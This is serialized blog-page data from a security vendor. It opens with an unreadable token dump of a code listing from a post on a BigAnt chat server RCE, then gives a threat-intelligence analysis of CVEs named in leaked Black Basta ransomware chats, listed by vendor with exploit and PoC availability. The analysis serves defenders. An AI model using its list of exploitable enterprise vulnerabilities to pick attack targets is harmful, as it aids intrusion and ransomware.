ine":4806},[1373,53348,38930],{"class":4640},[1373,53350,5417],{"class":1397},[1373,53352,45847],{"class":1391},[1373,53354,38938],{"class":4640},[1373,53356,5417],{"class":1397},[1373,53358,38943],{"class":1391},[1373,53360,38946],{"class":4640},[1373,53362,5417],{"class":1397},[1373,53364,183],{"class":1387},[1373,53366,45978],{"class":1391},[1373,53368,19057],{"class":1387},[1373,53370,53371,53373,53375,53377,53379,53381,53383,53385,53387,53389,53391],{"class":1375,"line":4817},[1373,53372,38930],{"class":4640},[1373,53374,5417],{"class":1397},[1373,53376,45989],{"class":1391},[1373,53378,38938],{"class":4640},[1373,53380,5417],{"class":1397},[1373,53382,38943],{"class":1391},[1373,53384,38946],{"class":4640},[1373,53386,5417],{"class":1397},[1373,53388,183],{"class":1387},[1373,53390,46004],{"class":1391},[1373,53392,19057],{"class":1387},[1373,53394,53395,53397,53399,53401,53403,53405,53407,53409,53411,53413,53415],{"class":1375,"line":4825},[1373,53396,38930],{"class":4640},[1373,53398,5417],{"class":1397},[1373,53400,46015],{"class":1391},[1373,53402,38938],{"class":4640},[1373,53404,5417],{"class":1397},[1373,53406,38943],{"class":1391},[1373,53408,38946],{"class":4640},[1373,53410,5417],{"class":1397},[1373,53412,183],{"class":1387},[1373,53414,46030],{"class":1391},[1373,53416,19057],{"class":1387},[1373,53418,53419,53421,53423,53425,53427,53429,53431,53433,53435,53437,53439],{"class":1375,"line":4835},[1373,53420,38930],{"class":4640},[1373,53422,5417],{"class":1397},[1373,53424,46041],{"class":1391},[1373,53426,38938],{"class":4640},[1373,53428,5417],{"class":1397},[1373,53430,38943],{"class":1391},[1373,53432,38946],{"class":4640},[1373,53434,5417],{"class":1397},[1373,53436,183],{"class":1387},[1373,53438,46056],{"class":1391},[1373,53440,19057],{"class":1387},[1373,53442,53443,53445,53447,53449,53451,53453,53455,53457,53459,53461,53463],{"class":1375,"line":4843},[1373,53444,38930],{"class":4640},[1373,53446,5417],{"class":1397},[1373,53448,46067],{"c
lass":1391},[1373,53450,38938],{"class":4640},[1373,53452,5417],{"class":1397},[1373,53454,38943],{"class":1391},[1373,53456,38946],{"class":4640},[1373,53458,5417],{"class":1397},[1373,53460,183],{"class":1387},[1373,53462,46082],{"class":1391},[1373,53464,19057],{"class":1387},[1373,53466,53467,53469,53471,53473,53475,53477,53479,53481,53483,53485,53487],{"class":1375,"line":4849},[1373,53468,38930],{"class":4640},[1373,53470,5417],{"class":1397},[1373,53472,46093],{"class":1391},[1373,53474,38938],{"class":4640},[1373,53476,5417],{"class":1397},[1373,53478,38943],{"class":1391},[1373,53480,38946],{"class":4640},[1373,53482,5417],{"class":1397},[1373,53484,183],{"class":1387},[1373,53486,46108],{"class":1391},[1373,53488,19057],{"class":1387},[1373,53490,53491,53493,53495,53497,53499,53501,53503,53505,53507,53509,53511],{"class":1375,"line":4877},[1373,53492,38930],{"class":4640},[1373,53494,5417],{"class":1397},[1373,53496,46119],{"class":1391},[1373,53498,38938],{"class":4640},[1373,53500,5417],{"class":1397},[1373,53502,38943],{"class":1391},[1373,53504,38946],{"class":4640},[1373,53506,5417],{"class":1397},[1373,53508,183],{"class":1387},[1373,53510,46134],{"class":1391},[1373,53512,19057],{"class":1387},[1373,53514,53515,53517,53519,53521,53523,53525,53527,53529,53531,53533,53535],{"class":1375,"line":4915},[1373,53516,38930],{"class":4640},[1373,53518,5417],{"class":1397},[1373,53520,46145],{"class":1391},[1373,53522,38938],{"class":4640},[1373,53524,5417],{"class":1397},[1373,53526,38943],{"class":1391},[1373,53528,38946],{"class":4640},[1373,53530,5417],{"class":1397},[1373,53532,183],{"class":1387},[1373,53534,46160],{"class":1391},[1373,53536,19057],{"class":1387},[1373,53538,53539,53541,53543,53545,53547,53549,53551,53553,53555,53557,53559,53561,53563,53565,53567],{"class":1375,"line":4931},[1373,53540,38930],{"class":4640},[1373,53542,5417],{"class":1397},[1373,53544,46145],{"class":1391},[1373,53546,38938],{"class":4640},[1373,53548,5417],{"class":139
7},[1373,53550,38943],{"class":1391},[1373,53552,38946],{"class":4640},[1373,53554,5417],{"class":1397},[1373,53556,183],{"class":1387},[1373,53558,46185],{"class":1391},[1373,53560,19169],{"class":1387},[1373,53562,46190],{"class":2206},[1373,53564,19169],{"class":1387},[1373,53566,46195],{"class":1391},[1373,53568,19057],{"class":1387},[1373,53570,53571,53573,53575,53577,53579,53581,53583,53585,53587,53589,53591],{"class":1375,"line":4947},[1373,53572,38930],{"class":4640},[1373,53574,5417],{"class":1397},[1373,53576,46206],{"class":1391},[1373,53578,38938],{"class":4640},[1373,53580,5417],{"class":1397},[1373,53582,38943],{"class":1391},[1373,53584,38946],{"class":4640},[1373,53586,5417],{"class":1397},[1373,53588,183],{"class":1387},[1373,53590,46221],{"class":1391},[1373,53592,19057],{"class":1387},[1373,53594,53595,53597,53599,53601,53603,53605,53607,53609,53611,53613,53615],{"class":1375,"line":4952},[1373,53596,38930],{"class":4640},[1373,53598,5417],{"class":1397},[1373,53600,46206],{"class":1391},[1373,53602,38938],{"class":4640},[1373,53604,5417],{"class":1397},[1373,53606,38943],{"class":1391},[1373,53608,38946],{"class":4640},[1373,53610,5417],{"class":1397},[1373,53612,183],{"class":1387},[1373,53614,46246],{"class":1391},[1373,53616,19057],{"class":1387},[1373,53618,53619,53621,53623,53625,53627,53629,53631,53633,53635,53637,53639],{"class":1375,"line":6776},[1373,53620,38930],{"class":4640},[1373,53622,5417],{"class":1397},[1373,53624,46257],{"class":1391},[1373,53626,38938],{"class":4640},[1373,53628,5417],{"class":1397},[1373,53630,39062],{"class":1391},[1373,53632,38946],{"class":4640},[1373,53634,5417],{"class":1397},[1373,53636,183],{"class":1387},[1373,53638,46272],{"class":1391},[1373,53640,19057],{"class":1387},[1373,53642,53643,53645,53647,53649,53651,53653,53655,53657,53659,53661,53663],{"class":1375,"line":6781},[1373,53644,38930],{"class":4640},[1373,53646,5417],{"class":1397},[1373,53648,46257],{"class":1391},[1373,53650,38938],{"class":
4640},[1373,53652,5417],{"class":1397},[1373,53654,38943],{"class":1391},[1373,53656,38946],{"class":4640},[1373,53658,5417],{"class":1397},[1373,53660,183],{"class":1387},[1373,53662,46297],{"class":1391},[1373,53664,19057],{"class":1387},[1373,53666,53667,53669,53671,53673],{"class":1375,"line":7524},[1373,53668,3129],{"class":2206},[1373,53670,46306],{"class":1391},[1373,53672,46309],{"class":4640},[1373,53674,46312],{"class":1391},[1373,53676,53677,53679,53681,53683,53685,53687,53689,53691,53693],{"class":1375,"line":7530},[1373,53678,1384],{"class":1383},[1373,53680,28578],{"class":2206},[1373,53682,2230],{"class":1383},[1373,53684,46323],{"class":2206},[1373,53686,46326],{"class":1391},[1373,53688,46329],{"class":1391},[1373,53690,46332],{"class":1391},[1373,53692,46335],{"class":1391},[1373,53694,46338],{"class":1391},[1373,53696,53697],{"class":1375,"line":7546},[1373,53698,6520],{"emptyLinePlaceholder":237},[1373,53700,53701,53703,53705,53707,53709,53711,53713,53715,53717,53719,53721,53723,53725,53727,53729,53731,53733,53735,53737,53739,53741,53743,53745],{"class":1375,"line":7571},[1373,53702,46347],{"class":2206},[1373,53704,46350],{"class":1391},[1373,53706,46353],{"class":4640},[1373,53708,46356],{"class":2326},[1373,53710,46359],{"class":4640},[1373,53712,46362],{"class":2326},[1373,53714,46365],{"class":4640},[1373,53716,46368],{"class":2326},[1373,53718,46371],{"class":4640},[1373,53720,46374],{"class":2326},[1373,53722,46377],{"class":4640},[1373,53724,46380],{"class":2326},[1373,53726,46383],{"class":4640},[1373,53728,46386],{"class":2326},[1373,53730,46389],{"class":4640},[1373,53732,46392],{"class":2326},[1373,53734,46395],{"class":4640},[1373,53736,46398],{"class":2326},[1373,53738,46401],{"class":4640},[1373,53740,46404],{"class":2326},[1373,53742,46407],{"class":4640},[1373,53744,46410],{"class":1397},[1373,53746,35556],{"class":4640},[1373,53748,53749],{"class":1375,"line":7598},[1373,53750,35556],{"class":2206},[1373,53752,53753,53755,53757,
53759],{"class":1375,"line":7615},[1373,53754,46421],{"class":2206},[1373,53756,46424],{"class":1391},[1373,53758,46427],{"class":2326},[1373,53760,46430],{"class":1391},[1373,53762,53763],{"class":1375,"line":7635},[1373,53764,6520],{"emptyLinePlaceholder":237},[1373,53766,53767,53769,53771,53773,53775,53777,53779,53781,53783,53785,53787,53789,53791,53793,53795,53797,53799,53801,53803,53805,53807,53809,53811],{"class":1375,"line":7640},[1373,53768,46347],{"class":2206},[1373,53770,46350],{"class":1391},[1373,53772,46353],{"class":4640},[1373,53774,46356],{"class":2326},[1373,53776,46359],{"class":4640},[1373,53778,46362],{"class":2326},[1373,53780,46365],{"class":4640},[1373,53782,46368],{"class":2326},[1373,53784,46371],{"class":4640},[1373,53786,46374],{"class":2326},[1373,53788,46377],{"class":4640},[1373,53790,46380],{"class":2326},[1373,53792,46383],{"class":4640},[1373,53794,46386],{"class":2326},[1373,53796,46389],{"class":4640},[1373,53798,46392],{"class":2326},[1373,53800,46395],{"class":4640},[1373,53802,46398],{"class":2326},[1373,53804,46401],{"class":4640},[1373,53806,46404],{"class":2326},[1373,53808,46407],{"class":4640},[1373,53810,46410],{"class":1397},[1373,53812,53813],{"class":4640},"^C\n",[18,53815,53816],{},"Sometimes an incorrectly categorized CVSS vector is all it takes to motivate you to find something interesting.",[61,53818,202],{"id":201},[18,53820,53821,53822,1246,53827,1246,53831,1246,53835,53839,53840],{},"The VulnCheck Initial Access team is always on the lookout for new exploitation in the wild. 
For more research like this, see our blogs, ",[47,53823,53826],{"href":53824,"rel":53825},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Ffour-faith-cve-2024-12856",[51],"Four-Faith Industrial Router CVE-2024-12856 Exploited in the Wild",[47,53828,40447],{"href":53829,"rel":53830},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fpapercut-rce",[51],[47,53832,36637],{"href":53833,"rel":53834},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fprojectsend-exploited-itw",[51],[47,53836,35931],{"href":53837,"rel":53838},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fjuniper-cve-2023-36845",[51],"\n, and ",[47,53841,22211],{"href":53842,"rel":53843},"https:\u002F\u002Fvulncheck.com\u002Fblog\u002Fconfluence-dreams-of-shells",[51],[18,53845,53846,53847,53850,53851,982,53854,1260],{},"Sign up to our website today to get free access to our ",[47,53848,1233],{"href":2871,"rel":53849},[51]," and request a trial of our ",[47,53852,1245],{"href":45535,"rel":53853},[51],[47,53855,216],{"href":214,"rel":53856},[51],[2901,53858,53859],{},"",{"title":219,"searchDepth":220,"depth":220,"links":53861},[53862,53863,53864,53865,53866,53867,53868],{"id":45528,"depth":220,"text":45529},{"id":46436,"depth":220,"text":46437},{"id":48835,"depth":220,"text":48836},{"id":49587,"depth":220,"text":49588},{"id":52400,"depth":220,"text":52401},{"id":52518,"depth":220,"text":52519},{"id":201,"depth":220,"text":202},"2025-02-27","VulnCheck identifies an unauthenticated remote code execution in the BigAnt chat server",{"slug":53872},"bigant-cve-2025-0364","\u002Fblog\u002Fbigant-cve-2025-0364",{"title":45509,"description":53870},"blog\u002Fbigant-cve-2025-0364",[242,1281],"knMHqzgd7RJAfpCO784qLkW8MLHfCAeaZKATJBy2qF0",{"id":53879,"title":53880,"articles":53881,"authors":53923,"body":53925,"date":54484,"description":53957,"extension":234,"image":7,"link":7,"meta":54485,"navigation":237,"path":54487,"seo":54488,"series":7,"stem":54489,"subtype":7,"tags":54490,"__hash__":54491},"blog\u002Fblog\u002Fblack-basta-chats.md","Exposing CVEs from Black Bastas' Chats",[53882,53887,53891,53894,53897,53902,53906,53910,53913,53918],{"title":53883,"source":53884,"link":53885,"date":53886},"Black Basta ransomware leak sheds light on targets, tactics","Tech Target","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Fnews\u002F366619641\u002FBlack-Basta-ransomware-leak-sheds-light-on-targets-tactics","2025-02-25",{"title":53888,"source":3495,"link":53889,"date":53890},"Risky Bulletin: Signal threatens to leave Sweden over 
backdoor request","https:\u002F\u002Frisky.biz\u002Frisky-bulletin-signal-threatens-to-leave-sweden-over-backdoor-request\u002F","2025-02-26",{"title":53892,"source":14386,"link":53893,"date":53869},"23 Vulnerabilities in Black Basta’s Chat Logs Exploited in the Wild, Including PAN-OS, Cisco IOS, & Exchange","https:\u002F\u002Fcybersecuritynews.com\u002F23-vulnerabilities-black-basta-chat\u002F",{"title":53895,"source":10841,"link":53896,"date":53869},"Leaked ransomware chat logs reveal Black Basta’s targeted CVEs","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fleaked-ransomware-chat-logs-reveal-black-bastas-targeted-cves\u002F741129\u002F",{"title":53898,"source":53899,"link":53900,"date":53901},"Leaked chats from Black Basta expose targets and tactics","Bob's Guide","https:\u002F\u002Fwww.bobsguide.com\u002Fleaked-chats-from-black-basta-expose-targets-and-tactics\u002F","2025-02-28",{"title":53903,"source":53904,"link":53905,"date":53901},"Black Basta Ransomware Tactics Breach Microsoft, and Others","Inside Telecom","https:\u002F\u002Finsidetelecom.com\u002Fransomware-tactics-exploiting-critical-technological-vulnerabilities\u002F",{"title":53907,"source":3486,"link":53908,"date":53909},"Ransomware access playbook: What Black Basta’s leaked logs reveal","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F3836040\u002Fransomware-access-playbook-what-black-bastas-leaked-logs-reveal.html","2025-03-03",{"title":53911,"source":14378,"link":53912,"date":53909},"Black Basta Leak Offers Glimpse Into Group’s Inner Workings","https:\u002F\u002Fwww.securityweek.com\u002Fblack-basta-leak-offers-glimpse-into-groups-inner-workings\u002F",{"title":53914,"source":53915,"link":53916,"date":53917},"VulnCheck Exposes CVEs from Black Bastas’ Chats","InformationSecurityBuzz","https:\u002F\u002Finformationsecuritybuzz.com\u002Fvulncheck-exposes-cve-from-black-basta\u002F","2025-03-04",{"title":53919,"source":53920,"link":53921,"date":53922},"Deciphering Black Basta’s 
Infrastructure from the Chat Leak","Channel E2E","https:\u002F\u002Fwww.channele2e.com\u002Fnative\u002Fdeciphering-black-bastas-infrastructure-from-the-chat-leak","2025-03-31",[53924],{"name":10,"avatar":11,"link":12,"linkName":13},{"type":15,"value":53926,"toc":54472},[53927,53933,53935,53955,53958,53961,53965,53971,53974,54113,54116,54148,54151,54155,54161,54164,54199,54203,54210,54214,54217,54220,54225,54241,54246,54254,54259,54267,54272,54280,54285,54296,54301,54309,54314,54322,54325,54329,54343,54348,54352,54355,54375,54378,54382,54385,54447,54451,54461,54463,54465,54467],[18,53928,53929],{},[68,53930],{"alt":53931,"src":53932,"width":28205},"Black Basta","\u002Fblog\u002Fblack-basta-chats\u002Fblack-basta-profile.png",[61,53934,20],{"id":3520},[22,53936,53937,53940,53946,53949,53952],{},[25,53938,53939],{},"62 unique CVEs were mentioned in the Black Basta chat logs.",[25,53941,53942,53943,59],{},"53 of the 62 CVEs (85.5%) are known to be exploited and are listed in ",[47,53944,1233],{"href":2871,"rel":53945},[51],[25,53947,53948],{},"44 of the CVEs (70.9%) appear in the CISA KEV catalog.",[25,53950,53951],{},"Black Basta shows a clear preference for targets with known weaknesses, focusing on vulnerabilities that already have available exploits.",[25,53953,53954],{},"The group seems to favor widely adopted enterprise technologies, including products like Citrix NetScaler, Confluence Atlassian, Fortinet, Cisco, Palo Alto, CheckPoint, and Microsoft Windows.",[18,53956,53957],{},"Late last week, chat logs from Black Basta became available, offering rare insight into the operations of one of the most infamous ransomware groups. This research focuses on the vulnerabilities and CVEs mentioned in these logs, with the goal of providing defenders with actionable intelligence on the tactics of Black Basta.",[18,53959,53960],{},"The initial phase involved collecting all CVEs referenced in the chats. 
Although there were discussions about discovering new vulnerabilities, it became evident that Black Basta generally prioritizes known weaknesses, often leveraging available tools and proof-of-concept exploits. It is important to note that a mention of a CVE in the chat does not necessarily mean that it was used in an attack.",[61,53962,53964],{"id":53963},"possible-black-basta-targets-mentioned-vendors-products","Possible Black Basta Targets Mentioned: Vendors & Products",[18,53966,53967],{},[68,53968],{"alt":53969,"src":53970,"width":28205},"Black Basta by Vendor and Product","\u002Fblog\u002Fblack-basta-chats\u002Fblack-basta-vendors.png",[18,53972,53973],{},"Black Basta appears to be targeting a mix of initial access devices and Microsoft technologies:",[22,53975,53976,53982,53988,53994,54000,54006,54012,54018,54024,54030,54036,54042,54048,54054,54060,54066,54072,54078,54084,54089,54095,54101,54107],{},[25,53977,53978,53981],{},[295,53979,53980],{},"Fortinet:"," CVE-2024-23109, CVE-2024-23108, CVE-2024-21762, CVE-2024-23113",[25,53983,53984,53987],{},[295,53985,53986],{},"Citrix Netscaler:"," CVE-2023-3519, CVE-2023-3467, CVE-2023-3466, CVE-2023-4966",[25,53989,53990,53993],{},[295,53991,53992],{},"Palo Alto Networks Pan-OS:"," CVE-2024-3400",[25,53995,53996,53999],{},[295,53997,53998],{},"Checkpoint:"," CVE-2024-24919",[25,54001,54002,54005],{},[295,54003,54004],{},"F5 Big-IP:"," CVE-2022-1388",[25,54007,54008,54011],{},[295,54009,54010],{},"Juniper OS:"," CVE-2023-36845, CVE-2023-36844",[25,54013,54014,54017],{},[295,54015,54016],{},"Connectwise:"," CVE-2024-1709, CVE-2024-1708",[25,54019,54020,54023],{},[295,54021,54022],{},"Microsoft Windows:"," CVE-2020-1472, CVE-2021-40444, CVE-2021-42287, CVE-2021-42278, CVE-2022-30190, CVE-2022-37969, CVE-2023-36874, CVE-2023-36884, CVE-2024-21338, CVE-2024-26169, CVE-2023-36394, CVE-2023-35628",[25,54025,54026,54029],{},[295,54027,54028],{},"Zyxel:"," 
CVE-2022-30525",[25,54031,54032,54035],{},[295,54033,54034],{},"Atlassian Confluence"," CVE-2021-44228, CVE-2024-21683, CVE-2023-22515, CVE-2022-26134",[25,54037,54038,54041],{},[295,54039,54040],{},"Brick Builders Wordpress Theme"," CVE-2024-25600",[25,54043,54044,54047],{},[295,54045,54046],{},"Cisco:"," CVE-2023-20198",[25,54049,54050,54053],{},[295,54051,54052],{},"Gitlab:"," CVE-2023-7028",[25,54055,54056,54059],{},[295,54057,54058],{},"Google Chrome:"," CVE-2022-0609",[25,54061,54062,54065],{},[295,54063,54064],{},"Intel:"," cve-2017-5754, cve-2017-5753",[25,54067,54068,54071],{},[295,54069,54070],{},"JetBrains"," CVE-2024-27198",[25,54073,54074,54077],{},[295,54075,54076],{},"Jenkins"," CVE-2024-23897",[25,54079,54080,54083],{},[295,54081,54082],{},"Linux"," CVE-2024-1086",[25,54085,54086,54088],{},[295,54087,54070],{}," CVE-2023-42793",[25,54090,54091,54094],{},[295,54092,54093],{},"RARLAB"," CVE-2023-38831",[25,54096,54097,54100],{},[295,54098,54099],{},"VMware Spring"," CVE-2022-22965",[25,54102,54103,54106],{},[295,54104,54105],{},"Microsoft SharePoint"," CVE-2023-29357",[25,54108,54109,54112],{},[295,54110,54111],{},"Microsoft Office"," CVE-2023-23397, CVE-2023-21716, CVE-2017-11882",[18,54114,54115],{},"Black Basta appears to also target email and communication services including:",[22,54117,54118,54124,54130,54136,54142],{},[25,54119,54120,54123],{},[295,54121,54122],{},"Microsoft Exchange:"," CVE-2021-26855, CVE-2021-28482, CVE-2021-42321, CVE-2022-41040, CVE-2022-41082, CVE-2023-36745",[25,54125,54126,54129],{},[295,54127,54128],{},"Microsoft Outlook:"," CVE-2024-21378, CVE-2024-21413",[25,54131,54132,54135],{},[295,54133,54134],{},"Exim:"," CVE-2023-42115",[25,54137,54138,54141],{},[295,54139,54140],{},"Zimbra:"," CVE-2022-27925, CVE-2022-37042, CVE-2022-41352",[25,54143,54144,54147],{},[295,54145,54146],{},"WordPress SMTP plugins:"," CVE-2023-6875, CVE-2023-7027",[18,54149,54150],{},"These email services offer relatively safe vectors for phishing 
campaigns and can provide initial access into organizations' networks.",[61,54152,54154],{"id":54153},"how-quickly-and-at-what-frequency-are-cves-being-discussed-by-black-basta","How Quickly and at What Frequency Are CVEs Being Discussed by Black Basta?",[18,54156,54157],{},[68,54158],{"alt":54159,"src":54160,"width":28205},"Frequency of CVE discussions","\u002Fblog\u002Fblack-basta-chats\u002Fblack_basta_mentions.png",[18,54162,54163],{},"Analyzing the timeline between the publication of CVEs and their first mention in the chats provides insight into Black Basta’s targeting speed:",[22,54165,54166,54172,54189],{},[25,54167,54168,54171],{},[295,54169,54170],{},"Rapid Response:"," Within days of new security advisories being issued, members discussed vulnerabilities related to products such as Citrix NetScaler, Check Point Quantum Security Gateways, ConnectWise ScreenConnect, Microsoft Office Outlook, Fortinet FortiSIEM, Palo Alto Networks PAN-OS, Atlassian Confluence Server and Data Center, Cisco IOS XE Web UI, Microsoft Windows, GitLab CE\u002FEE, and Fortinet FortiOS.",[25,54173,54174,54177,54178],{},[295,54175,54176],{},"Pre-Publication Mentions:"," Interestingly, three CVEs were discussed before their official publication:\n",[22,54179,54180,54183,54186],{},[25,54181,54182],{},"Fortinet FortiOS (CVE-2024-23113)",[25,54184,54185],{},"Bricks Builder WordPress Theme (CVE-2024-25600)",[25,54187,54188],{},"Exim Email (CVE-2023-42115)\nAccording to VulnCheck, while these CVE IDs were included in product security advisories, there was a delay in the official publication by the CVE Numbering Authority.",[25,54190,54191,54194,54195],{},[295,54192,54193],{},"Older Vulnerabilities:"," A number of older vulnerabilities also appeared in the chats, often as part of a “Top 10 of 2022” list that highlighted widely exploited issues. 
One CVE was even described as “Old but not forgotten.”\n",[68,54196],{"alt":54197,"src":54198},"Top 10 2022","\u002Fblog\u002Fblack-basta-chats\u002Fblack_basta_2022.png",[61,54200,54202],{"id":54201},"how-do-epss-and-cvss-score-the-mentioned-cves","How Do EPSS and CVSS Score the Mentioned CVEs?",[18,54204,54205,54209],{},[68,54206],{"alt":54207,"src":54208,"width":28205},"EPSS and CVSS","\u002Fblog\u002Fblack-basta-chats\u002Fblackbasta_scoring.png","\nWe mapped CVSS and EPSS to the CVEs discovered in the Black Basta logs using a scatter plot. The plot shows that both CVSS and EPSS scores are broadly distributed across the CVEs mentioned.",[61,54211,54213],{"id":54212},"are-all-cves-discussed-known-to-be-exploited-or-used-by-black-basta","Are All CVEs Discussed Known to Be Exploited or Used by Black Basta?",[18,54215,54216],{},"Of the 62 unique CVEs mentioned by Black Basta, VulnCheck KEV tracks 53 of the vulnerabilities as confirmed exploited in the wild.",[18,54218,54219],{},"Below are some notable observations on the nine CVEs where there was previously no evidence of exploitation:",[18,54221,54222],{},[295,54223,54224],{},"CVE-2017-5754 & CVE-2017-5753 (Intel Vulnerabilities):",[22,54226,54227,54235,54238],{},[25,54228,54229,54230,59],{},"Referenced in a ",[47,54231,54234],{"href":54232,"rel":54233},"https:\u002F\u002Fwww.dell.com\u002Fsupport\u002Fkbdoc\u002Fde-ch\u002F000178106\u002Fseitenkanal-sicherheitsluecken-von-mikroprozessoren-cve-2017-5715-cve-2017-5753-und-cve-2017-5754-auswirkungen-auf-dell-emc-server-storage-und-netzwerke#bios",[51],"Dell advisory",[25,54236,54237],{},"CVE-2017-5754 features a weaponized Core Impact exploit and four PoC exploits; CVE-2017-5753 has eight PoC exploits.",[25,54239,54240],{},"Both have EPSS scores exceeding 0.97, suggesting they should be prioritized with urgency.",[18,54242,54243],{},[295,54244,54245],{},"CVE-2024-21378 (Microsoft Outlook RCE):",[22,54247,54248,54251],{},[25,54249,54250],{},"Black 
Basta confirmed it works in a production environment. “We've tested the new RCE in Microsoft Outlook (CVE-2024-21378) in a production environment and confirm it works well!”",[25,54252,54253],{},"Four PoC exploits exist, yet its EPSS score is very low (0.00064).",[18,54255,54256],{},[295,54257,54258],{},"CVE-2023-7027 (WordPress Plugin Vulnerability):",[22,54260,54261,54264],{},[25,54262,54263],{},"Identified as one of two options to compromise SMTP services on WordPress.",[25,54265,54266],{},"Three PoC exploits are available, yet the EPSS score remains low (0.00263).",[18,54268,54269],{},[295,54270,54271],{},"CVE-2023-36394 (Microsoft Windows):",[22,54273,54274,54277],{},[25,54275,54276],{},"Black Basta considered purchasing an exploit for this CVE.",[25,54278,54279],{},"We are not aware of any PoC exploits, yet the EPSS score is elevated at 0.28553.",[18,54281,54282],{},[295,54283,54284],{},"CVE-2024-23109 & CVE-2024-23108 (FortiSIEM Vulnerabilities):",[22,54286,54287,54290,54293],{},[25,54288,54289],{},"Both were highlighted due to their perfect CVSS scores of 10.",[25,54291,54292],{},"CVE-2024-23108 has three PoC exploits; none have been observed for CVE-2024-23109.",[25,54294,54295],{},"Both share low EPSS scores (0.00124).",[18,54297,54298],{},[295,54299,54300],{},"CVE-2023-35628 (Microsoft Windows Vulnerability):",[22,54302,54303,54306],{},[25,54304,54305],{},"Comes with three PoC exploits and an EPSS score of 0.00213.",[25,54307,54308],{},"An MSRC link was provided for further details.",[18,54310,54311],{},[295,54312,54313],{},"CVE-2023-42115 (Exim Email Server Vulnerability):",[22,54315,54316,54319],{},[25,54317,54318],{},"Reiterated in the chats as a prime target, one comment noted, “SMTP, but I didn’t find a single PoC, I'm collecting all Exim servers.”",[25,54320,54321],{},"Its EPSS score is 0.00075.",[18,54323,54324],{},"After remediating all vulnerabilities confirmed to be exploited in the wild (those found in VulnCheck KEV), it would then be 
advisable to treat any of the CVEs mentioned in the Black Basta chats as if they are being exploited in the wild.",[61,54326,54328],{"id":54327},"cve-2024-21683-rejected-by-cveorg","CVE-2024-21683 Rejected by CVE.org",[18,54330,54331,54332,54337,54338,59],{},"Black Basta also mentions Atlassian Confluence ",[47,54333,54336],{"href":54334,"rel":54335},"https:\u002F\u002Fvulncheck.com\u002Fcve\u002FCVE-2024-21683",[51],"CVE-2024-21683",", which CVE.org lists as rejected even though there is evidence of exploitation from Shadowserver, available exploits including a Metasploit module for this CVE, and an ",[47,54339,54342],{"href":54340,"rel":54341},"https:\u002F\u002Fjira.atlassian.com\u002Fbrowse\u002FCONFSERVER-95832",[51],"Atlassian vendor security advisory",[18,54344,54345],{},[68,54346],{"alt":54336,"src":54347},"\u002Fblog\u002Fblack-basta-chats\u002Frejected-cve.png",[61,54349,54351],{"id":54350},"what-other-vulnerabilities-and-tools-might-be-being-used-by-blackbasta","What Other Vulnerabilities and Tools Might Black Basta Be Using?",[18,54353,54354],{},"Beyond the CVEs identified in the chats, there is evidence that Black Basta employs a broader arsenal of exploits while targeting vulnerabilities:",[22,54356,54357,54363,54369],{},[25,54358,54359,54362],{},[295,54360,54361],{},"Opportunistic Exploitation:","\nThe group appears to favor existing vulnerabilities and readily available PoC exploits for initial access, particularly targeting email services.",[25,54364,54365,54368],{},[295,54366,54367],{},"Tooling and Techniques:","\nDiscussions frequently reference tools and platforms such as ZoomInfo, ChatGPT, GitHub, Shodan, Fofa, Metasploit, Core Impact, Cobalt Strike, and Nuclei, among other tools. 
A mix of offensive and defensive security tools underscores the group’s flexible, opportunistic approach.",[25,54370,54371,54374],{},[295,54372,54373],{},"Exploit Development & Acquisition:","\nIn addition to using known exploits, there is evidence suggesting that Black Basta has the resources to develop new exploits. On several occasions, they also hesitantly considered purchasing exploits from external groups.",[18,54376,54377],{},"This opportunistic behavior reinforces the importance of promptly fixing vulnerabilities that are known to be weaponized in any exploit framework or security tool.",[61,54379,54381],{"id":54380},"additional-observations","Additional Observations",[18,54383,54384],{},"Black Basta selects its targets based on several key factors:",[22,54386,54387,54401,54412,54420,54431,54439],{},[25,54388,54389,54390],{},"Financial Viability and Ransom Payment Potential:\n",[22,54391,54392,54395,54398],{},[25,54393,54394],{},"The group tends to prioritize high-revenue companies over a large number of random targets.",[25,54396,54397],{},"Discussions suggest that fewer high-profile targets generate more revenue than mass-targeting lower-value entities.",[25,54399,54400],{},"There is a clear emphasis on targeting organizations that are more likely to pay ransoms.",[25,54402,54403,54404],{},"Vulnerability-Based Targeting:\n",[22,54405,54406,54409],{},[25,54407,54408],{},"They discuss specific exploits for initial access and email services, indicating a preference for targets with known weaknesses.",[25,54410,54411],{},"Pre-attack reconnaissance includes checking domain and infrastructure vulnerabilities.",[25,54413,54414,54415],{},"Industry-Specific Selection:\n",[22,54416,54417],{},[25,54418,54419],{},"Companies in sectors such as legal, financial, healthcare, and industrial, which typically handle sensitive data, are frequently targeted due to their higher likelihood of paying to protect client confidentiality.",[25,54421,54422,54423],{},"Access to Initial 
Compromise:\n",[22,54424,54425,54428],{},[25,54426,54427],{},"Decisions often hinge on whether initial access is available. This includes leveraging exposed RDP, Citrix, VPN, or email credentials.",[25,54429,54430],{},"Some attacks begin with methods like credential stuffing or brute-force attempts.",[25,54432,54433,54434],{},"Geographical Considerations:\n",[22,54435,54436],{},[25,54437,54438],{},"Although Black Basta claims to be apolitical, discussions imply that they may selectively target companies in regions with specific financial or regulatory environments.",[25,54440,54441,54442],{},"Use of Stolen Data for Secondary Extortion:\n",[22,54443,54444],{},[25,54445,54446],{},"In certain cases, the group discusses selling stolen data to competitors or foreign entities, highlighting the attractiveness of targets with valuable intellectual property or business secrets.",[61,54448,54450],{"id":54449},"final-thoughts-on-the-black-basta-chats","Final Thoughts on the Black Basta Chats",[18,54452,54453,54455,54456,59],{},[68,54454],{"alt":53931,"src":53932,"width":28205},"\nThe analysis of Black Basta's chat logs reveals a methodical yet opportunistic approach that focuses on well-known vulnerabilities and high-value targets. While the group leverages established exploit frameworks and readily available tools, their discussions also suggest potential for new exploit development and tactical shifts. 
